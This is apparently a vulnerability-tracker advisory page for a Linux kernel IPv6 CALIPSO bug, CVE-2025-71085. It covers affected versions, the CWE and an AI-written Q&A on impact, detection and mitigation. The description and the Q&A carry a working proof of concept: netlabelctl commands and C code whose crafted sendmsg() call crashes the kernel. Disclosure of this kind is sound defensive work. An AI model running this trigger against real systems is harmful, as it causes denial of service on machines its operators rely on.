CVE-2025-71085
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2026-01-13

Last updated on: 2026-03-25

Assigner: kernel.org

Description
In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0). The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead. Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7 Then run the following PoC: int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0; // setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337; // setup cmsghdr cmsg->cmsg_len = cmsg_len; cmsg->cmsg_level = IPPROTO_IPV6; cmsg->cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80 sendmsg(fd, &msg, 0);
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-01-13
Last Modified
2026-03-25
Generated
2026-05-06
AI Q&A
2026-01-14
EPSS Evaluated
2026-05-05
NVD
CVE-2025-71085
Affected Vendors & Products
Showing 15 associated CPEs
Vendor Product Version / Range
linux linux_kernel From 5.11 (inc) to 5.15.198 (exc)
linux linux_kernel 4.8
linux linux_kernel 6.19
linux linux_kernel 6.19
linux linux_kernel 6.19
linux linux_kernel 6.19
linux linux_kernel 6.19
linux linux_kernel From 6.13 (inc) to 6.18.4 (exc)
linux linux_kernel From 5.16 (inc) to 6.1.160 (exc)
linux linux_kernel From 6.2 (inc) to 6.6.120 (exc)
linux linux_kernel From 6.7 (inc) to 6.12.64 (exc)
linux linux_kernel 6.19
linux linux_kernel 6.19
linux linux_kernel 6.19
linux linux_kernel From 4.8.1 (inc) to 5.10.248 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-617 The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability is a bug in the Linux kernel's IPv6 code, specifically in the function pskb_expand_head() called by calipso_skbuff_setattr(). It occurs due to an integer cast issue in __skb_cow() where a check meant to prevent negative values fails if headroom is greater than INT_MAX. This leads to a kernel oops (crash) caused by passing a negative value to pskb_expand_head(), triggered when skb_cow() is called with an invalid headroom size. The bug can be triggered using the netlabelctl tool and specially crafted socket messages.


How can this vulnerability impact me? :

This vulnerability can cause a kernel oops, which is a type of kernel crash. This can lead to denial of service by crashing the system or causing instability in the Linux kernel networking stack when handling IPv6 packets with calipso attributes. It may disrupt network operations and affect system availability.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by attempting to reproduce the kernel oops using the provided proof of concept (PoC) involving the netlabelctl tool and a crafted sendmsg() call with specific IPv6 hop-by-hop options. The PoC commands include: 1) netlabelctl map del default 2) netlabelctl calipso add pass doi:7 3) netlabelctl map add default address:0::1/128 protocol:calipso,7. Then, running the provided C code snippet that creates an IPv6 UDP socket and sends a message with a crafted control message to trigger the bug. Monitoring the kernel logs (e.g., using dmesg) for BUG_ON or kernel oops messages at net/core/skbuff.c:2232 can confirm the presence of the vulnerability.


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include applying the patch that fixes the trigger condition in calipso_skbuff_setattr() to avoid passing negative headroom sizes to skb_cow(). Until a patch is applied, disabling or restricting the use of the calipso protocol or netlabel features related to calipso_skbuff_setattr() may reduce exposure. Monitoring and blocking suspicious IPv6 packets with crafted hop-by-hop options using firewall rules could also help mitigate exploitation attempts.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart